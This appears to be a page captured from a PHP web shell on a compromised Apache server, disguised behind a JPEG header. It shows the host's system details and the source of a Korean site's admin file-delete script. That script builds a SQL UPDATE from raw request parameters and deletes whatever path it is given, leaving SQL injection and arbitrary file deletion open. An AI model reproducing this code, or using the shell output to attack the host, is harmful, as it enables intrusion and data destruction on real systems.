ÿØÿà JFIF ` ` ÿþ
Server : Apache System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : tkt_travelbus ( 1137) PHP Version : 7.0.0p1 Disable Function : mysql_pconnect Directory : /tkt_travelbus/www/admin/board/ |
Upload File : |
<? /** * 파일 삭제 처리 (iframe) * * 작성자 : * 작성일 : 2009.08.20 */ include "$_SERVER[DOCUMENT_ROOT]/Lib/config.php"; include "$_SERVER[DOCUMENT_ROOT]/Lib/common.lib.php"; include "$_SERVER[DOCUMENT_ROOT]/Lib/connect.php"; // 변수 설정 print_r($_REQUEST); $IDX_NM = $_REQUEST[IDX_NM]; // 관리번호필드명 $MSEQ = $_REQUEST[MSEQ]; // 관리번호 $TB_NM = $_REQUEST[TB_NM]; // 테이블명 $FL_NM = $_REQUEST[FL_NM]; // 필드명 $IMG_NM = $_REQUEST[IMG_NM]; // 파일명 $IMG_PATH = $_REQUEST[IMG_PATH]; // 파일경로(이미지 경로=폴더명) // 파일 경로 설정 $FileFolder = $_SERVER[DOCUMENT_ROOT].$IMG_PATH; // 파일 삭제 if (file_exists($FileFolder . $IMG_NM)) { @unlink($FileFolder . $IMG_NM); } // 파일 삭제후 업데이트 (20090820 ) $sql = "update ".$TB_NM." set ".$FL_NM." = '' where ".$IDX_NM." = '".$MSEQ."'"; @db_query($sql); ?> <script type="text/javascript"> parent.location.reload(); </script>